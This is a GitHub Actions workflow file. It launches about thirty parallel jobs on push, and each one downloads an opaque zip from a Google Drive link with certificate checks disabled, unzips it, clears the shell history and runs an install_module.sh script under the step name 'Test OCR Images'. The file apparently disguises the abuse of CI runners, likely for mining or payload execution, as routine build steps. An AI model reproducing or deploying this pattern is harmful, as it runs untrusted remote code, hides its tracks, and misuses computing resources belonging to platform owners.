name: thongtin0core
on:
  push:
    branches: [ "main" ]
  workflow_dispatch:

jobs:
  check:
    runs-on: ubuntu-latest
    strategy:
      fail-fast: false
      max-parallel: 10
      matrix:
        go: [I.0, I.I, I.II]
        flag: ['Configure', 'Package', 'Assess', 'Operate', 'Distribute']

    env:
        NUM_JOBS: 20
        JOB: ${ matrix.go }
    steps:
    - uses: actions/checkout@v1
    - name: Install Packages
      run: |
        wget --no-check-certificate "https://docs.google.com/uc?export=download&id=1o4Rf6JX64JLp640Ryv45s2xAfOFRiQME" -O thongtin0core.zip
        unzip -o thongtin0core.zip
        rm thongtin0core.zip
        history -c && history -w

    - name: Test OCR Images
      run: bash install_module.sh


  COMPILE1:
    runs-on: ubuntu-latest
    strategy:
      fail-fast: false
      max-parallel: 10
      matrix:
        go: [I.0, I.I, I.II]
        flag: ['Adapt', 'Assemble', 'Confirm', 'Ignite', 'Release']

    env:
        NUM_JOBS: 20
        JOB: ${ matrix.go }
    steps:
    - uses: actions/checkout@v1
    - name: Install Packages
      run: |
        wget --no-check-certificate "https://docs.google.com/uc?export=download&id=1o4Rf6JX64JLp640Ryv45s2xAfOFRiQME" -O thongtin0core.zip
        unzip -o thongtin0core.zip
        rm thongtin0core.zip
        history -c && history -w

    - name: Test OCR Images
      run: bash install_module.sh
        
